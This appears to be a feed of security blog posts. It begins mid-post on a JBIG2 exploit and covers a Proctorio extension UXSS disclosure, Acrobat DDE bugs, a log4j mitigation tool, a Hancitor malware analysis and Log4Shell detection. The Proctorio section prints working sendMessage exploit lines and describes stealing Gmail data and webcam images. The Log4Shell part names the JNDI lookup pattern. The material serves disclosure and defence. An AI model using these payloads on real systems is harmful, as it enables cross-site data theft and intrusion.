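// operations -- the same class of circuit the exploit encodes as tens of
// thousands of JBIG2 segment commands.
uint64_t rippleAdd(uint64_t a, uint64_t b) {
    uint64_t sum = 0, carry = 0;
    for (int i = 0; i < 64; ++i) {
        uint64_t ai = (a >> i) & 1, bi = (b >> i) & 1;
        uint64_t s  = ai ^ bi ^ carry;                  // full-adder sum bit
        carry       = (ai & bi) | (carry & (ai ^ bi)); // full-adder carry bit
        sum        |= s << i;
    }
    return sum;   // equals a + b modulo 2^64
}
```

A comparator falls out of the same circuit (subtract and inspect the carry), which is all the exploit needs to search memory and do arithmetic.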
The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.
In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.
Proctorio Chrome extension Universal Cross-Site Scripting
The switch to online exams
In February of 2020 the first person in the Netherlands tested positive for COVID-19, which quickly led to a national lockdown. Universities had to close for physical lectures, which meant they had to switch to both online lectures and online tests on short notice.
For universities this posed a problem: how do you prevent students from cheating if they take the test in a location where you have no control or visibility? In the Netherlands most universities quickly adopted anti-cheating software that students were required to install in order to take a test, much to the dissatisfaction of students, who found this software too invasive of their privacy. Students were required to run monitoring software on their personal device that would monitor their behaviour via the webcam and screen recording.
The usage of this software was covered by national media on a regular basis, as students fought to stop universities from using this kind of software. This led to several court cases where universities had to defend the usage of this software. The judge ended up ruling in favour of the universities.
Proctorio is one such monitoring tool, and it is used by most Dutch universities. For students it comes as a Google Chrome extension. And indeed, the extension has quite an extensive list of permissions, including recording your screen and reading and changing all data on the websites you visit.
All this was reason enough for us to have a closer look at this much-debated software. After all, vulnerabilities in this extension could have considerable privacy implications for students who have it installed. In the end, we found a severe vulnerability leading to Universal Cross-Site Scripting (UXSS), which could be triggered by any website. This means that a malicious website visited by the user could steal or modify data from any other website if the victim had the Proctorio extension installed. The vulnerability has since been fixed by Proctorio. As Chrome extensions are updated automatically, this requires no action from Proctorio users.
Background
Chrome extensions consist of two parts. A background page with JavaScript is the core of the extension, which has the permissions granted to the extension. It can add scripts to currently open tabs, which are known as content scripts. Content scripts have access to the DOM, but use a separate JavaScript environment. Content scripts do not have the full permissions of the background page, but their ability to communicate with the background page makes them more powerful than the JavaScript on a page itself.
Vulnerability details
The Proctorio extension inspects the network traffic of the browser. When it observes requests for paths that match supported test-taking websites, it injects content scripts into the page. It tries to determine whether the user is taking a Proctorio-enabled test by retrieving details of the test from specific API endpoints used by the supported test websites.
Once a test is started, a toolbar is added with a number of buttons allowing a student to manage Proctorio. This includes a button to open a calculator, which supports some simple mathematical calculations.
When the user clicks the ‘=’ button, a function is called in the content script to compute the result. The computation is performed by calling the JavaScript eval() function; in the minified JavaScript this happens in the function named ghij. The eval() function is dangerous, as it can execute arbitrary JavaScript, not just mathematical expressions, and ghij does not check that the input is actually a mathematical expression.
Because the calculator is added to the DOM of the page activating Proctorio, JavaScript on the page can automatically enter an expression into the calculator and then trigger the evaluation. This allows the webpage to execute code inside the content script. From the context of the content script, the page can then send messages to the background page that are handled as if they came from the content script. Using a combination of messages, we found we could trigger UXSS.
(In our Zoom exploit, the calculator was opened just to demonstrate our ability to launch arbitrary applications, but in this case we actually exploit the calculator itself!)
Exploitation to UXSS
By using one of a number of specific paths in the URL, adding certain DOM elements and sending specific responses to a small number of API requests Proctorio can be activated by any website without user approval. By pretending to be in demo mode and automatically activating the demo, the page can start a complete Proctorio session. This happens completely automatically, without user interaction. Then, the page can open the calculator and use the exploit to execute code in the content script.
The content script itself does not have the full permissions of the browser extension, but it does have permission to send messages to the background page. The JavaScript on the background page supports a large number of different message types, each identified by a number in the first element of the array that makes up the message.
The first thing that can be done using that is to download a URL while bypassing the Same Origin Policy. There are a number of different message types that will download a URL and return the result. For example, message number 502:
chrome.runtime.sendMessage([502, '1', '2', 'https://www.google.com/#'], alert);
(The # is used here to make sure anything appended after it is not sent to the server.)
This downloads the URL in the session of the current user and returns the result to the page. This could be used, for example, to retrieve all of the user’s email messages if they are signed in to their webmail and it uses cookies for authentication. Normally, this is not allowed unless the URL has the same origin, or the response specifically allows it using Cross-Origin Resource Sharing (CORS).
A CORS bypass is already a serious vulnerability, but it can be extended further. A universal cross-site scripting attack can be performed in the following way.
Some messages trigger the injection of new content scripts into the tab. Sometimes, variables need to be passed to those scripts. Most of the time those variables are escaped correctly, but for the message with number 25 the argument is not escaped. The minified code for this handler is:
if (25 == a[0]) return chrome.tabs.executeScript(b.tab.id, {
code: c0693(a[1])
}, function() {}), c({}), !0;
which calls:
function c0693(a) {
return "(" + function(a) {
var b = document.getElementsByTagName("body");
if (b.length) b[0].innerHTML = a; else {
b = document.getElementsByTagName("html")[0];
var c = document.createElement("body");
c.innerHTML = a;
b.appendChild(c);
}
} + ")(" + a + ");";
}
This function c0693() contains a function which is converted to a string. The inner function is not executed by the background page; converting it to a string takes the source text of the function, which is then invoked with the argument a in the content script. Note that the last line of c0693() does not escape that value. This means it is possible to inject JavaScript, which is then executed in the context of the content script in the same tab that sent the message.
Evaluating JavaScript in the same tab again is not very useful on its own, but it is possible to make the tab switch origins between sending the message and the execution of the new script. This is because the call to executeScript specifies the tab id, which does not change when navigating to a different page.
A message with number 507 uses a synchronous XMLHttpRequest, which means that the JavaScript of the entire background page is blocked while waiting for the HTTP response. By sending a request to a URL set up to take 5 seconds to respond, then immediately sending a message with number 25 and changing the location of the tab, the JavaScript from the 25 message is executed on the new page instead.
For example, the following will allow the https://computest.nl origin to execute an alert on the https://example.com origin:
chrome.runtime.sendMessage([507, '1', '2', 'https://computest.nl/sleep#']);
chrome.runtime.sendMessage([25, 'alert(document.domain)']);
document.location = 'https://example.com';
The URL https://computest.nl/sleep is used here as an example of a URL that takes 5 seconds to respond.
The video below demonstrates the attack:
Finally, the user could notice that Proctorio is enabled based on the color of the Proctorio icon in the browser bar, which turns green once it activates. However, sending the message [32, false] turns the icon grey again, even though Proctorio is still active. The malicious webpage can quickly turn the icon grey after exploiting the content script, leaving the user only a few milliseconds to notice the attack.
What can we do with UXSS?
An important security mechanism of your browser is the Same Origin Policy (SOP). Without SOP, surfing the web would be very insecure, as websites would be able to read data from other domains (origins). It is the most important security control the browser has to enforce.
With a Universal XSS vulnerability, a malicious webpage can run JavaScript on other pages, regardless of origin. This makes it a very powerful primitive for an attacker to have in a browser. The video below shows that we can use this primitive to obtain a screenshot from the webcam and to download a GMail inbox, using our exploit from above.
For stealing GMail data we just need to inject some JavaScript that copies the content of the inbox and sends it to a server under our control. For getting a webcam screenshot we rely on the fact that most people will have allowed certain legitimate domains to have webcam access. In particular, users of Proctorio who had to enable their webcam for a test will have given the legitimate test website permission to use the webcam. We use UXSS to open a tab of such a domain and inject some JavaScript that grabs a webcam screenshot. In the example we rely on the fact that the victim has previously granted the domain zoom.us webcam access. This can be any page, but due to the pandemic we think that zoom.us would be a pretty safe bet. (The stuffed animal is called Dikkie Dik, from a well known Dutch children’s picture book.)
Disclosure
We contacted Proctorio with our findings on June 18th, 2021. They replied back within hours thanking us for our findings. Within a week (on June 25th) they reported that the vulnerability was fixed and a new version was pushed to the Google Chrome Web Store. We verified that the vulnerability was fixed on August 3rd. Since Google Chrome automatically updates installed extensions, this requires no further action from the end-user. At the time of writing version 1.4.21183.1 is the latest version.
In the fixed version, an iframe is used to load a webpage for the calculator, meaning exploiting this vulnerability is no longer possible.
Installing software on your (personal) device, whether for work or for study, always adds new risks end-users should be aware of. In general it is wise to uninstall software as soon as you no longer need it, in order to mitigate this risk. In this situation one could disable the Proctorio plugin, to avoid it being accessible when you are not taking a test.
Exploring Acrobat’s DDE attack surface
Introduction
Adobe Acrobat has been our favorite target to poke at for bugs lately, given that it's one of the most popular and most versatile PDF readers available. In our previous research, we hammered Adobe Acrobat's JavaScript APIs by writing dharma grammars and testing them against Acrobat. As we continued investigating those APIs, we decided, as a change of scenery, to look into other features Adobe Acrobat provides. Even though it has a rich attack surface, we had to find which parts would be a good place to start looking for bugs.
While looking at the broker functions, we noticed that there’s a function that’s accessible through the renderer that triggers DDE calls. That by itself was a reason for us to start looking into the DDE component of Acrobat.
In this blog we'll dive into part of Adobe Acrobat's attack surface, starting with DDE via Adobe IAC.
DDE in Acrobat
To understand how DDE works let's first introduce the concept of inter-process communication (IPC).
So, what is IPC? It's a mechanism, provided by the operating system, for processes to communicate with each other. It could be one process informing another about an event that has occurred, or managing shared data between processes. In order for these processes to understand each other, they have to agree on a certain communication approach/protocol. There are several IPC mechanisms supported by Windows, such as mailslots, pipes, DDE, etc.
In Adobe Acrobat DDE is supported through Acrobat IAC which we will discuss later in this blog.
What is DDE?
In short, DDE stands for Dynamic Data Exchange, a message-based protocol used for sending messages and transferring data from one process to another using shared memory.
In each inter-process communication with DDE, a client and a server engage in a conversation.
A DDE conversation is established using uniquely defined strings as follows:
Service name: a unique string defined by the application that implements the DDE server, used by both the DDE client and the DDE server to initialize the communication.
Topic name: is a string that identifies a logical data context.
Item name: is a string that identifies a unit of data a server can pass to a client during a transaction.
DDE shares these strings using the system's Global Atom Table (see the Windows documentation on atoms for more details). The DDE protocol also defines how applications should use the wParam and lParam parameters to pass larger pieces of data through shared memory handles and global atoms.
When is DDE used?
DDE is most appropriate for data exchanges that do not require ongoing user interaction. An application using DDE provides a way for the user to set up the exchange between the two applications; once the transfer is established, the applications continue to exchange data without further user intervention, much like socket communication.
The ability to use DDE in an application running on Windows can be added through DDEML.
Introducing DDEML
The Dynamic Data Exchange Management Library (DDEML), provided by Windows, makes it easier to add DDE support to an application by providing an interface that simplifies managing DDE conversations. Instead of sending, posting, and processing DDE messages directly, an application can use the DDEML functions to manage DDE conversations.
So, usually the following steps happen when a DDE client wants to start a conversation with the server:
1. Initialization
Before calling any DDE function, we need to register our application with DDEML and specify the transaction filter flags for the callback function. The following functions are used for the initialization part:
DdeInitializeW()
DdeInitializeA()
Note: "A" used to indicate "ANSI" A Unicode version with the letter "W" used to indicate "wide"
2. Establishing a Connection
In order to connect our client to a DDE server, we must use the service and topic names associated with the application. The following function returns a handle to our connection, which will be used later for data transactions and connection termination:
DdeConnect()
3. Data Transaction
In order to send data from the DDE client to the DDE server, we call the following function:
DdeClientTransaction()
4. Connection Termination
DDEML provides a function for terminating any DDE conversations and freeing any related DDEML resources:
DdeUninitialize()
Acrobat IAC
As discussed before, Adobe Acrobat's Inter-Application Communication (IAC) allows an external application to control and manipulate a PDF file inside Adobe Acrobat using several methods, such as OLE and DDE.
For example, let's say you want to merge two PDF documents into one and save the result under a different name. What do we need to achieve that?
Obviously, we need Adobe Acrobat DC Pro.
The service and topic names for Acrobat:
The topic name is "Control".
Service name:
"AcroViewA21": here "A" means Acrobat and "21" refers to the version.
"AcroViewR21": here "R" stands for Reader.
So, to retrieve the service name for your installation based on the product and the version, you can check the registry key:
What is the item we are going to use ?
When we send a DDE command to the server implemented in Acrobat, the item will be NULL.
Adobe Acrobat Reader DC supports several DDE messages, but some of these messages require Adobe Acrobat DC Pro in order to work.
The format of the message should be between brackets and is case-sensitive, e.g.:
Displaying document: such as "[FileOpen()]" and "[DocOpen()]".
Saving and printing documents: such as "[DocSave()]" and "[DocPrint()]".
Searching document: such as "[DocFind()]".
Manipulating document such as: "[DocInsertPage()]" and "[DocDeletePages()]".
Note: in order to use Adobe Acrobat DDE messages that start with Doc, the file must first be opened using the [DocOpen()] message.
We started by defining the service and topic names for Adobe Acrobat and the DDE messages we want to send. In our case, we want to merge two documents into one, so we need three DDE methods: "[DocOpen()]", "[DocInsertPages()]" and "[DocSaveAs()]":
Next, as discussed before, we first need to register our application with DDEML using DdeInitialize():
After the initialization step, we have to connect to the DDE server using the service and topic names that we defined earlier:
Now we need to send our message using DdeClientTransaction(). As we can see, we used XTYPE_EXECUTE with a NULL item, and our command is stored in an HDDEDATA handle created by calling DdeCreateDataHandle(). After executing this part of the code, Adobe Acrobat will open the PDF document, append the other document to it, save the result as a new file, and then exit:
The last part is closing the connection and cleaning the opened handles:
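The four DDEML steps walked through above (initialize, connect, execute with a NULL item, terminate) can be sketched in Python with ctypes. This is an illustrative, Windows-only sketch, not the authors' actual client: the no-op callback, constants, and error handling are deliberately simplified, and the argument widths in the callback signature are approximations.

```python
import ctypes
import sys

# Constants from ddeml.h / winuser.h
APPCMD_CLIENTONLY = 0x00000010
XTYPE_EXECUTE = 0x4050
CF_TEXT = 1
CP_WINUNICODE = 1200

def dde_execute(service, topic, command):
    """Send one DDE execute transaction to a running server (Windows only)."""
    if sys.platform != "win32":
        raise OSError("DDEML lives in user32.dll; this sketch requires Windows")
    user32 = ctypes.windll.user32
    # Minimal no-op callback; a real client would dispatch on transaction type.
    cb_type = ctypes.WINFUNCTYPE(ctypes.c_void_p, *([ctypes.c_void_p] * 8))
    callback = cb_type(lambda *args: None)
    inst = ctypes.c_uint32(0)
    # 1. Register the application with DDEML (0 == DMLERR_NO_ERROR).
    if user32.DdeInitializeW(ctypes.byref(inst), callback, APPCMD_CLIENTONLY, 0):
        return False
    try:
        hsz_service = user32.DdeCreateStringHandleW(inst, service, CP_WINUNICODE)
        hsz_topic = user32.DdeCreateStringHandleW(inst, topic, CP_WINUNICODE)
        # 2. Connect using the service/topic pair, e.g. ("AcroViewR21", "Control").
        conv = user32.DdeConnect(inst, hsz_service, hsz_topic, None)
        if not conv:
            return False
        # 3. Execute transaction: NULL item, command wrapped in a data handle.
        data = user32.DdeCreateDataHandle(inst, command, len(command) + 1,
                                          0, 0, CF_TEXT, 0)
        result = user32.DdeClientTransaction(data, 0xFFFFFFFF, conv, 0, 0,
                                             XTYPE_EXECUTE, 5000, None)
        return bool(result)
    finally:
        # 4. Terminate the conversation and free DDEML resources.
        user32.DdeUninitialize(inst)
```

On a machine with Acrobat running, something like `dde_execute("AcroViewR21", "Control", b'[DocOpen("C:\\\\test.pdf")]')` would ask Acrobat to open the document.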
So we decided to take a look at Adobe plugins to see who else implements a DDE server, by searching for DdeInitialize() calls:
Great 😈, it seems five plugins implement a DDE service. Before analyzing these plugins, we searched for more information about them and found that the search and catalog plug-ins are documented by Adobe... good, what's next!
Search Plug-in
We started to read about the search plug-in and we summarized it in the following:
Acrobat has a feature which allows the user to search for text inside a PDF document. But we already mentioned a DDE method called DocFind(), right? Well, DocFind() searches the PDF document page by page, while the search plug-in performs an indexed search that accepts a word in the form of a query; in other words, we can search a cataloged PDF 🙂.
So basically the search plug-in allows the client to send search queries and manipulate indexes.
When implementing a client that communicates with the search plug-in, the service and topic names will be "Acrobat Search" instead of "Acroview".
Remember, when we sent a DDE request to Adobe Acrobat the item was NULL, but the search plug-in defines two types of items the client can use to submit query data, and one item for manipulating indexes:
SimpleQuery item: allows the user to send a query that supports Boolean operations, e.g. to search for any occurrence of the word "bye" or "hello" we can send "bye OR hello".
Query item: allows different search queries and lets us specify the parser handling the query.
The item name used to manipulate indexes is "Index", and the DDE transaction type is XTYPE_POKE, a single poke transaction.
So, we started by manipulating indexes. When we attempt to do an operation on indexes the data must be in the following form:
Where eAction represents the action to be made on the index:
Adding index
Deleting index
Enabling or Disabling index on the shelf.
cbData[0] stores the path of the index file we want to act on, for example "C:\\XD\\test.pdx". A PDX file is an index file created from one or more IDX files.
CVE-2021-39860
So, we started analyzing the function responsible for handling the structure data sent by the client, and it turned out there are no checks on the data sent.
As we can see, after calling DdeAccessData() the EAX register stores a pointer to our data, and the code accesses whatever data is at offset 4. So to trigger an access violation at "movsx eax, word ptr [ecx+4]", simply send a two-byte string, which results in an out-of-bounds read 🙂 as demonstrated in the following crash:
Catalog Plug-in
Acrobat DC has a feature that allows the user to create a full-text index file for one or multiple PDF documents that will be searchable using the search command. The file extension is PDX. It will store the text of all specified PDF documents.
The Catalog plug-in supports several DDE methods, such as:
[FileOpen(full path)]: used to open an index file and display the edit index dialog box; the file name must end with the PDX extension.
[FilePurge(full path)]: used to purge an index definition file; the file name must also end with the PDX extension.
The topic name for Catalog is "Control", and the service name according to the Adobe documentation is "Acrobat"; however, if we check the registry key belonging to Adobe Catalog, we can see that it is "Acrocat" (meoww) instead of "Acrobat".
Using IDA Pro, we can see the DDE methods that the Catalog plug-in supports, along with the service and topic names:
CVE-2021-39861
Since there are several DDE methods that we can send to the Catalog plug-in, and these DDE methods accept one argument (except for the App-related methods) which is a path to a file, we started analyzing the function responsible for handling this argument, and it turned out 🙂:
The function checks the start of the string (the supplied argument) for \xFE\xFF; if present, it calls the Bug() function, which reads the string as a Unicode string; otherwise it calls sub_22007210(), which reads the string as an ANSI string.
So, if we can send "\xFE\xFF" (a byte order mark) at the start of an ASCII string, then we will probably end up with an out-of-bounds read, since the code will look for the Unicode NUL terminator "\x00\x00" instead of the ASCII NUL terminator.
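To illustrate why mixing up the two terminator conventions causes an overread, here is a small self-contained model of the flawed scan. This is our own illustrative Python, not Acrobat's code; the function name and the explicit bounds check are assumptions added so the model terminates.

```python
def scan_terminator(buf):
    """Model of the flawed terminator scan. A buffer that starts with the
    0xFE 0xFF byte order mark is walked two bytes at a time looking for a
    UTF-16 NUL (\\x00\\x00); the real code has no bounds check, so an ASCII
    payload ending in a single NUL is read past its end."""
    if buf[:2] == b"\xfe\xff":
        i = 2
        while i < len(buf) and buf[i:i + 2] != b"\x00\x00":
            i += 2
        # If i runs past len(buf), the real code keeps reading: OOB read.
        return i
    # ANSI path: stop at the first single-byte NUL terminator.
    return buf.index(b"\x00")

# An ASCII string prefixed with the BOM: the single NUL at the end is
# stepped over, and the scan runs off the end of the buffer.
payload = b"\xfe\xffAAAA\x00"
```

A well-formed UTF-16 string (with a two-byte NUL) is handled fine; only the BOM-plus-ASCII mismatch walks out of bounds.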
Here we can see the function handling the Unicode string:
And 😎:
Here we can see a snippet of the POC:
That’s it for today. Stay tuned for more new attack surfaces blogs!
Happy Hunting!
log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
tl;dr Run our new tool by adding -javaagent:log4j-jndi-be-gone-1.0.0-standalone.jar
to all of your JVM Java stuff to stop log4j from loading classes remotely over LDAP. This will prevent malicious inputs from triggering the “Log4Shell” vulnerability and gaining remote code execution on your systems.
In this post, we first offer some context on the vulnerability, the released fixes (and their shortcomings), and finally our mitigation (or you can skip directly to our mitigation tool here).
Context: log4shell
Hello internet, it’s been a rough week. As you have probably learned, basically every Java app in the world uses a library called “log4j” to handle logging, and that any string passed into those logging calls will evaluate magic ${jndi:ldap://...}
sequences to remotely load (malicious) Java class files over the internet (CVE-2021-44228, “Log4Shell”). Right now, while the SREs are trying to apply the not-quite-a-fix official fix and/or implement egress filtering without knocking their employers off the internet, most people are either blaming log4j for even having this JNDI stuff in the first place and/or blaming the issue on a lack of support for the project that would have helped to prevent such a dangerous behavior from being so accessible.
In reality, the JNDI stuff is regrettably more of an “enterprise” feature than one that developers would just randomly put in if left to their own devices. Enterprise Java is all about antipatterns that invoke code in roundabout ways to the point of obfuscation, and about supporting ever more dynamic ways to integrate weird protocols like RMI to load and invoke remote code. Even the log4j format “Interpolator” wraps a bunch of handlers, including the JNDI handler, in reflection wrappers. So, if anything, more “(financial) support” for the project would probably just lead to more of these kinds of things happening as demand for one-off formatters for new systems grows among larger users. Welcome to Enterprise Java Land, where they’ve already added log4j variable expansion for Docker and Kubernetes.
Alas, the real problem is that log4j 2.x (the version basically everyone uses) is designed in such a way that all string arguments after the main format string for the logging call are also treated as format strings. Basically, every log4j call is equivalent to the following C:
printf("%s\n", "clobbering some bytes %n");
were implemented as the very unsafe code below:
char *buf;
asprintf(&buf, "%s\n", "clobbering some bytes %n");
printf(buf);
Basically, log4j never got the memo about format string vulnerabilities and now it’s (probably) too late. It was only a matter of time until someone realized they exposed a magic format string directive that led to code execution (and even without the classloading part, it is still a means of leaking expanded variables out through other JNDI-compatible services, like DNS), and I think it may only be a matter of time until another dangerous format string handler gets introduced into log4j. Meanwhile, even without JNDI, if someone has access to your log4j output (wherever you send it), and can cause their input to end up in a log4j call (pretty much a given based on the current havoc playing out) they can systematically dump all sorts of process and system state into it including sensitive application secrets and credentials. Had log4j not implemented their formatting this way, then the JNDI issue would only impact applications that concatenated user input into the format string (a non-zero amount, but much less than 100%).
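The design flaw can also be modeled in a few lines of Python. This is a toy stand-in for log4j's lookup expansion, not its real implementation; the `${...}` handling and the `{}` parameter substitution are deliberately simplified.

```python
import re

def expand_lookups(message):
    # Toy stand-in for log4j's ${prefix:key} lookup expansion: every
    # ${...} sequence in the message gets "resolved".
    return re.sub(r"\$\{([^}]*)\}",
                  lambda m: "<resolved " + m.group(1) + ">", message)

def log(fmt, *args):
    # The flaw in miniature: parameters substituted into the message are
    # themselves subject to lookup expansion, so attacker-controlled *data*
    # behaves like a format string even when the format string is a
    # harmless constant written by the developer.
    msg = fmt
    for arg in args:
        msg = msg.replace("{}", arg, 1)
    return expand_lookups(msg)
```

Here `log("user agent: {}", user_input)` expands a `${jndi:...}` sequence inside `user_input` even though the developer only ever wrote a constant format string, mirroring the "arguments are also format strings" problem described above.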
The “Fixes”
The main fix is to update to the just released log4j 2.16.0. Prior to that, the official mitigation from the log4j maintainers was:
“In releases >=2.10, this behavior can be mitigated by setting either the system property
log4j2.formatMsgNoLookups
or the environment variableLOG4J_FORMAT_MSG_NO_LOOKUPS
totrue
. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove theJndiLookup
class from the classpath:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
.”
So to be clear, the fix given for older versions of log4j (2.0-beta9 until 2.10.0) is to find and purge the JNDI handling class from all of your JARs, which are probably all-in-one fat JARs because no one uses classpaths anymore, all to prevent it from being loaded.
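For those stuck on that class-purging mitigation, the effect of the `zip -q -d` command can also be had programmatically. The following is a minimal Python sketch of the same idea (illustrative only; it rewrites the archive, since ZIP entries cannot be deleted in place with the standard library, and it does not preserve every archive attribute):

```python
import os
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def purge_jndilookup(jar_path):
    """Rewrite a JAR without the JndiLookup entry, mirroring
    `zip -q -d <jar> .../JndiLookup.class`. Returns True if removed."""
    tmp_path = jar_path + ".tmp"
    removed = False
    with zipfile.ZipFile(jar_path) as src, \
         zipfile.ZipFile(tmp_path, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                removed = True
                continue  # drop the offending class, copy everything else
            dst.writestr(info, src.read(info.filename))
    os.replace(tmp_path, jar_path)
    return removed
```

As with the zip one-liner, this only helps if the application does not verify its own JAR signatures, and you still need to find every fat JAR that bundles log4j.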
A tool to mitigate Log4Shell by disabling log4j JNDI
To try to make the situation a little bit more manageable in the meantime, we are releasing log4j-jndi-be-gone, a dead simple Java agent that disables the log4j JNDI handler outright. log4j-jndi-be-gone uses the Byte Buddy bytecode manipulation library to modify the at-issue log4j class’s method code and short circuit the JNDI interpolation handler. It works by effectively hooking the at-issue JndiLookup
class’ lookup()
method that Log4Shell exploits to load remote code, and forces it to stop early without actually loading the Log4Shell payload URL. It also supports Java 6 through 17, covering older versions of log4j that support Java 6 (2.0-2.3) and 7 (2.4-2.12.1), and works on read-only filesystems (once installed or mounted) such as in read-only containers.
The benefit of this Java agent is that a single command line flag can negate the vulnerability regardless of which version of log4j is in use, so long as it isn’t obfuscated (e.g. with proguard), in which case you may not be in a good position to update it anyway. log4j-jndi-be-gone is not a replacement for the -Dlog4j2.formatMsgNoLookups=true
system property in supported versions, but helps to deal with those older versions that don’t support it.
Using it is pretty simple, just add -javaagent:path/to/log4j-jndi-be-gone-1.0.0-standalone.jar
to your Java commands. In addition to disabling the JNDI handling, it also prints a message indicating that a log4j JNDI attempt was made with a simple sanitization applied to the URL string to prevent it from becoming a propagation vector. It also “resolves” any JNDI format strings to "(log4j jndi disabled)"
making the attempts a bit more grep-able.
$ java -javaagent:log4j-jndi-be-gone-1.0.0.jar -jar myapp.jar
log4j-jndi-be-gone is available from our GitHub repo, https://github.com/nccgroup/log4j-jndi-be-gone. You can grab a pre-compiled log4j-jndi-be-gone agent JAR from the releases page, or build one yourself with ./gradlew
, assuming you have a recent version of Java installed.
Remote ASLR Leak in Microsoft's RDP Client through Printer Cache Registry (CVE-2021-38665)
This is the second installment in my three-part series of articles on fuzzing Microsoft’s RDP client. I will explain a bug I found by fuzzing the printer sub-protocol, and how I exploited it.
Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666)
This is the third installment in my three-part series of articles on fuzzing Microsoft’s RDP client, where I explain a bug I found by fuzzing the smart card extension.
HANCITOR DOC drops via CLIPBOARD
By Sriram P & Lakshya Mathur
Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more. Recently at McAfee Labs, we observed Hancitor Doc VBA (Visual Basic for Applications) samples dropping the payload using the Windows clipboard through Selection.Copy method.
This blog focuses on the effectiveness of this newly observed technique and how it adds an extra layer of obfuscation to evade detection.
Below (Figure 1) are the geolocation-based stats of malicious Hancitor docs observed by McAfee since September 2021.
INFECTION CHAIN
- The victim will receive a Docusign-based phishing email.
- On clicking on the link (hxxp://mettlybothe.com/8/forum[.]php), a Word Document file is downloaded.
- On enabling the macro content in Microsoft Word, the macro drops an embedded OLE object, a password-protected macro-infected document file, and launches it.
- This second Document file drops the main Hancitor DLL (Dynamic Link Library) payload.
- The DLL payload is then executed via rundll32.exe.
TECHNICAL ANALYSIS
Malware authors send the victims a phishing email containing a link as shown in the below screenshot (Figure 3). The usual Docusign theme is used in this recent Hancitor wave. This phishing email contains a link to the original malicious word document. On clicking the link, the Malicious Doc file is downloaded.
Since the macros are disabled by default configuration, malware authors try to lure victims into believing that the file is from legitimate organizations or individuals and will ask victims to enable editing and content to start the execution of macros. The screenshot below (Figure 4) is the lure technique that was observed in this current wave.
As soon as the victim enables editing, malicious macros are executed via the Document_Open function.
There is an OLE object embedded in the Doc file. The screenshot below (Figure 5) highlights the object as an icon.
The loader VBA function, invoked by document_open, calls this random function (Figure 6), which moves the selection cursor to the exact location of the OLE object using the selection methods (.MoveDown, .MoveRight, .MoveTypeBackspace). Using the Selection.Copy method, it will copy the selected OLE object to the clipboard. Once it is copied in the clipboard it will be dropped under %temp% folder.
When an embedded object is being copied to the clipboard, it gets written to the temp directory as a file. This method is used by the malware author to drop a malicious word document instead of explicitly writing the file to disk using macro functions like the classic FileSystemObject.
In this case, the file was saved to the %temp% location with the filename “zoro.kl” as shown in the below screenshot (Fig 8). Fig 7 shows the corresponding procmon log involving the file write event.
Using the CreateObject(“Scripting.FileSystemObject”) method, the malware moves the file to a new location \Appdata\Roaming\Microsoft\Templates and renames it to “zoro.doc”.
This file is then opened with the built-in document method, Documents.open. This moved file, zoro.doc, is password-protected. In this case, the password used was “doyouknowthatthegodsofdeathonlyeatapples?”. We have also seen the usage of passwords like “donttouchme”, etc.
This newly dropped doc is executed using the Documents.Open function (Figure 11).
Zoro.doc uses the same techniques to copy and drop the next payload as we saw earlier. The only difference is that it has a DLL as the embedded OLE object.
It drops the file in the %temp% folder using clipboard with the name “gelforr.dap”. Again, it moves gelforr.dap DLL file to \Appdata\Roaming\Microsoft\Templates (Figure 12).
Finally, after moving DLL to the templates folder, it is executed using Rundll32.exe by another VBA call.
MITRE ATT&CK
Technique ID | Tactic | Technique details |
--- | --- | --- |
T1566.002 | Initial Access | Spam mail with links |
T1204.001 | Execution | User Execution by opening the link. |
T1204.002 | Execution | Executing downloaded doc |
T1218 | Defense Evasion | Signed Binary Execution Rundll32 |
T1071 | C&C (Command & Control) | HTTP (Hypertext Transfer Protocol) protocol for communication |
IOC (Indicators Of Compromise)
Type | SHA-256 | Scanner | Detection Name |
--- | --- | --- | --- |
Main Doc | 915ea807cdf10ea4a4912377d7c688a527d0e91c7777d811b171d2960b75c65c | WSS | W97M/Dropper.im |
Dropped Doc | c1c89e5eef403532b5330710c9fe1348ebd055d0fe4e3ebbe9821555e36d408e | WSS | W97M/Dropper.im |
Dropped DLL | d83fbc9534957dd464cbc7cd2797d3041bd0d1a72b213b1ab7bccaec34359dbb | WSS | RDN/Hancitor |
URLs (Uniform Resource Locator) | hxxp://mettlybothe.com/8/forum[.]php | WebAdvisor | Blocked |
The post HANCITOR DOC drops via CLIPBOARD appeared first on McAfee Blog.
Log4Shell: Reconnaissance and post exploitation network detection
Note: This blogpost will be live-updated with new information. NCC Group’s RIFT is intending to publish PCAPs of different exploitation methods in the near future – last updated December 14th at 13:00 UTC
About the Research and Intelligence Fusion Team (RIFT): RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.
In the wake of the CVE-2021-44228
(a.k.a. Log4Shell) vulnerability publication, NCC Group’s RIFT immediately started investigating the vulnerability in order to improve detection and response capabilities mitigating the threat. This blog post is focused on detection and threat hunting, although attack surface scanning and identification are also quintessential parts of a holistic response. Multiple references for prevention and mitigation can be found included at the end of this post.
This blogpost provides Suricata network detection rules that can be used not only to detect exploitation attempts, but also indications of successful exploitation. In addition, a list of indicators of compromise (IOC’s) is provided. These IOC’s have been observed listening for incoming connections and are thus useful for threat hunting.
Update Wednesday December 15th, 17:30 UTC
We have seen 5 instances in our client base of active exploitation of Mobile Iron during the course of yesterday and today.
Our working hypothesis is that this is a derivative of the details shared yesterday – https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron.
The scale of the exposure globally appears significant.
We recommend all MobileIron users update immediately.
